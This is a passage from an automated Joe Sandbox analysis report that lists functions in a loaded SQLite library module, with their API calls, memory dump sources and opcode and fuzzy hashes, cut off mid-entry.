                                                    • Instruction Fuzzy Hash: C6314F35A043959BD710EF78C885B4D7BA1AFC5318F20C96DF8988B385C739E885CB92
                                                    Function 61E33E27 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E33E4D
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E33E57
                                                    • sqlite3_value_text.SQLITE3 ref: 61E33E81
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E33E8C
                                                    • sqlite3_result_error.SQLITE3 ref: 61E33ECC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_error
                                                    • String ID: null
                                                    • API String ID: 1955785328-634125391
                                                    • Opcode ID: 68b3ddb521818ca5ef41147905fd37d5a62d62699609f5841b2f6d6d2bb391b8
                                                    • Instruction ID: dc9870807a04e3228e61a85712befee8dbb836e06eb27f704a895a60105716dc
                                                    • Opcode Fuzzy Hash: 68b3ddb521818ca5ef41147905fd37d5a62d62699609f5841b2f6d6d2bb391b8
                                                    • Instruction Fuzzy Hash: 281105B2B483504BD714DE6E9484619BBE2DBC9328F24C52EE5848B344D235C896C792
                                                    Function 61E32797 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E327CC
                                                    • sqlite3_value_text.SQLITE3 ref: 61E327F5
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E32802
                                                    • sqlite3_value_text.SQLITE3 ref: 61E32827
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E32833
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                    • String ID: ,)?
                                                    • API String ID: 4225432645-1010226240
                                                    • Opcode ID: 243edcccd23f1fdd3acffced3a6b035112ac03142e80a75a60fbb7cc9f5662e4
                                                    • Instruction ID: 146a1ec40e7ca28d8e4d44351afad45f8546a73bc3f6b9f29888d3d8876476ab
                                                    • Opcode Fuzzy Hash: 243edcccd23f1fdd3acffced3a6b035112ac03142e80a75a60fbb7cc9f5662e4
                                                    • Instruction Fuzzy Hash: 12213876A046468FD710DF79C884A5ABBE5FFD8318F258429E998CB304E735E841CB81
                                                    Function 61E347BC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E347D2
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E347F7
                                                    • sqlite3_result_text.SQLITE3 ref: 61E34824
                                                    • sqlite3_result_text.SQLITE3 ref: 61E3484A
                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E3485A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                    • String ID: J
                                                    • API String ID: 3250357221-1141589763
                                                    • Opcode ID: b8e2c19c06d33d767a427b3e23f9cea282e3c87fa8310b7bf88711eac9cc4921
                                                    • Instruction ID: 4bdbf5e27a0d3cc01d15dff8d073131addd7688c5180e427c078862be1a21bef
                                                    • Opcode Fuzzy Hash: b8e2c19c06d33d767a427b3e23f9cea282e3c87fa8310b7bf88711eac9cc4921
                                                    • Instruction Fuzzy Hash: E2112AB0508791ABD700AF68C48131ABFE5AF85718F24C84EF8D88B345C37AC845CB92
                                                    Function 61E34680 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E34696
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E346B9
                                                    • sqlite3_result_text.SQLITE3 ref: 61E346E6
                                                    • sqlite3_result_text.SQLITE3 ref: 61E3470C
                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E3471C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                    • String ID: J
                                                    • API String ID: 3250357221-1141589763
                                                    • Opcode ID: dbbf009b67f7c3e662998250791786e0ed093e26d8a105de625a8d4e9c6078ea
                                                    • Instruction ID: 94ba5e957d0cfbe003597516d09a759e55d9c3860a3854fa7afee84d4290a1a7
                                                    • Opcode Fuzzy Hash: dbbf009b67f7c3e662998250791786e0ed093e26d8a105de625a8d4e9c6078ea
                                                    • Instruction Fuzzy Hash: D8115EB050C751ABE701AF68C48131ABFE4AF85758F24C84EE8D88B345D37AC855CB96
                                                    Function 61E299E9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E28A4C: sqlite3_log.SQLITE3(?,?,?,?,?,61E28AFF), ref: 61E28A87
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E29A18
                                                    • sqlite3_value_text16le.SQLITE3 ref: 61E29A2C
                                                    • sqlite3_value_text16le.SQLITE3 ref: 61E29A5A
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29A6E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID: bad parameter or other API misuse$out of memory
                                                    • API String ID: 3568942437-948784999
                                                    • Opcode ID: ec2f60c6a5e013083d2f701832924de90c855b3c65bc82f7265d5c3c8f3bdae4
                                                    • Instruction ID: e80f85b3b8c63b743e55c5bbee9fd55079b9f15eb33d3361d20ba988ac8f6a5c
                                                    • Opcode Fuzzy Hash: ec2f60c6a5e013083d2f701832924de90c855b3c65bc82f7265d5c3c8f3bdae4
                                                    • Instruction Fuzzy Hash: B7019271E083525BDB00AFB8C4C5619BBE4AF44258F25D8BCEC48CB301EB34C8448B91
                                                    Function 61E0A964 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,61E140AD), ref: 61E0A98E
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,61E140AD), ref: 61E0A9CA
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,61E140AD), ref: 61E0A9E3
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,61E140AD), ref: 61E0A9F6
                                                    • sqlite3_free.SQLITE3(?,?,?,61E140AD), ref: 61E0A9FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                    • String ID: La
                                                    • API String ID: 251237202-3337869896
                                                    • Opcode ID: e83a526db469e5bc5e1bdfaa8539c68862d013e6de9e6d0bb323729dbf19bba7
                                                    • Instruction ID: 5f2d8503298d2d4058c29cbee924fac0e8122472d9142b630f4b7bdd2ffd4a89
                                                    • Opcode Fuzzy Hash: e83a526db469e5bc5e1bdfaa8539c68862d013e6de9e6d0bb323729dbf19bba7
                                                    • Instruction Fuzzy Hash: DE11B075924F458FDB00AFBAC4819187BF4FB4A35AB654C2BE6848B341E734D8E08B52
                                                    Function 61E3A458 Relevance: 9.4, APIs: 6, Instructions: 361stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_logstrcmp
                                                    • String ID:
                                                    • API String ID: 2202632817-0
                                                    • Opcode ID: 84d98b9515ba97a50461e9c0bf5add406dc9f25a451e90fb9703fce6205291c3
                                                    • Instruction ID: 8fd6b8a6497bbc939a8ecdb0f5197d258d55031e7ecfdeac31effdce9d217907
                                                    • Opcode Fuzzy Hash: 84d98b9515ba97a50461e9c0bf5add406dc9f25a451e90fb9703fce6205291c3
                                                    • Instruction Fuzzy Hash: 79F1CF70A446599BDB04CFA8C484B9DBBF1BFC8308F248529E855EB364D774E886CB41
                                                    Function 61E89DF0 Relevance: 9.2, APIs: 6, Instructions: 220COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fda5707c5367a5609a68f59b85f519e52c22ebee4f4c7048db5e75176ef73e71
                                                    • Instruction ID: c4ee0dbc550a61711d9043ffca7045061a8d9286f17d654c948808656938edef
                                                    • Opcode Fuzzy Hash: fda5707c5367a5609a68f59b85f519e52c22ebee4f4c7048db5e75176ef73e71
                                                    • Instruction Fuzzy Hash: 1081EF75A056518FDB90DFA9C58064DBBF1FBC5304F28C86AE948DB344E730E981CB52
                                                    Function 61E1659A Relevance: 9.2, APIs: 6, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 2585109301-0
                                                    • Opcode ID: fb59ae4a89defd2a59bbfc0afadf22b89acaad1396ea9044deef1ad8e20a934b
                                                    • Instruction ID: ec3df70c5328205208f1d8f1316c3534c75edebc53eb647e954b84553c53ddca
                                                    • Opcode Fuzzy Hash: fb59ae4a89defd2a59bbfc0afadf22b89acaad1396ea9044deef1ad8e20a934b
                                                    • Instruction Fuzzy Hash: 3DA104B4A05646CFDB00CF68C481B9AB7F1BF89318F298569EC559B309D774E852CFA0
                                                    Function 61E37C28 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37C49
                                                      • Part of subcall function 61E3579B: sqlite3_initialize.SQLITE3 ref: 61E357A1
                                                      • Part of subcall function 61E3579B: sqlite3_vmprintf.SQLITE3 ref: 61E357BB
                                                    • sqlite3_free.SQLITE3 ref: 61E37D89
                                                    • sqlite3_free.SQLITE3 ref: 61E37D91
                                                      • Part of subcall function 61E3576D: sqlite3_free.SQLITE3 ref: 61E3577C
                                                      • Part of subcall function 61E3576D: sqlite3_vmprintf.SQLITE3 ref: 61E3578E
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_vmprintf$sqlite3_initializesqlite3_mprintf
                                                    • String ID:
                                                    • API String ID: 2044204354-0
                                                    • Opcode ID: 8b44e78c57b7acbbcf405c8d51cc9b41a01b9e883173a6e583b8319f6872d06c
                                                    • Instruction ID: f607f941133f24f1cd5aa97ec6305363dcaacf02a7c124ff1364089a89ee3984
                                                    • Opcode Fuzzy Hash: 8b44e78c57b7acbbcf405c8d51cc9b41a01b9e883173a6e583b8319f6872d06c
                                                    • Instruction Fuzzy Hash: 4141E3B0A08259DFDB00DFA9C584AAEBBF5AF89314F65C92AE859D7340E734D801CB51
                                                    Function 61E3311E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 335COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E32D9A: sqlite3_realloc64.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,61E32E89), ref: 61E32DC9
                                                      • Part of subcall function 61E09293: memcmp.MSVCRT ref: 61E092ED
                                                      • Part of subcall function 61E09293: memcmp.MSVCRT ref: 61E09351
                                                    • sqlite3_malloc64.SQLITE3 ref: 61E33339
                                                      • Part of subcall function 61E1A768: sqlite3_initialize.SQLITE3 ref: 61E1A773
                                                    • memcmp.MSVCRT ref: 61E333F9
                                                    • sqlite3_free.SQLITE3 ref: 61E334D7
                                                    • sqlite3_log.SQLITE3 ref: 61E33588
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: memcmp$sqlite3_freesqlite3_initializesqlite3_logsqlite3_malloc64sqlite3_realloc64
                                                    • String ID:
                                                    • API String ID: 885863977-3916222277
                                                    • Opcode ID: c60119ab7a7f30d667c1578a8102bffa3a73cb3e08f6ca592c4fa681bedeb349
                                                    • Instruction ID: f933ae6b4ad76911c00dc1a82c30c3486f1175013f09c1267096c89d5a90683d
                                                    • Opcode Fuzzy Hash: c60119ab7a7f30d667c1578a8102bffa3a73cb3e08f6ca592c4fa681bedeb349
                                                    • Instruction Fuzzy Hash: 41E1F574A042698FDB55CFA9C884B8DBBF1BF88309F208569D858EB395E774D845CF40
                                                    Function 61E238BA Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E238DC
                                                    • sqlite3_value_text.SQLITE3 ref: 61E238EA
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E238F7
                                                    • sqlite3_value_text.SQLITE3 ref: 61E23925
                                                    • sqlite3_result_error.SQLITE3 ref: 61E2394F
                                                    • sqlite3_result_int.SQLITE3 ref: 61E2398F
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                    • String ID:
                                                    • API String ID: 4226599549-0
                                                    • Opcode ID: ef62d7fc1af06d592b8cfc8334916520b1d1be7aa3b04cbfdd8ae48f06b795e9
                                                    • Instruction ID: 2971ff59faf1b1ddc058d146959d97f20c9d7fcd0502c0464a4a265fd2bfe131
                                                    • Opcode Fuzzy Hash: ef62d7fc1af06d592b8cfc8334916520b1d1be7aa3b04cbfdd8ae48f06b795e9
                                                    • Instruction Fuzzy Hash: DD210370A047459BCB00DFA9C4946A9BBF1BF8E324F24C92DE8A897394D734D841CF52
                                                    Function 61E36045 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E3605C
                                                    • sqlite3_result_error.SQLITE3 ref: 61E3608B
                                                    • sqlite3_value_text.SQLITE3 ref: 61E360A0
                                                    • sqlite3_load_extension.SQLITE3 ref: 61E360BB
                                                    • sqlite3_result_error.SQLITE3 ref: 61E360D6
                                                    • sqlite3_free.SQLITE3 ref: 61E360E1
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_result_errorsqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                    • String ID:
                                                    • API String ID: 356667613-0
                                                    • Opcode ID: faaf2aa58fa984701336af3892feb34707ba3759e2172f1538932955870c6dbc
                                                    • Instruction ID: 0c03d73ffdbe4f3598d8ac20a289f75fb966ddbbe44149442334c4a8417d5d9d
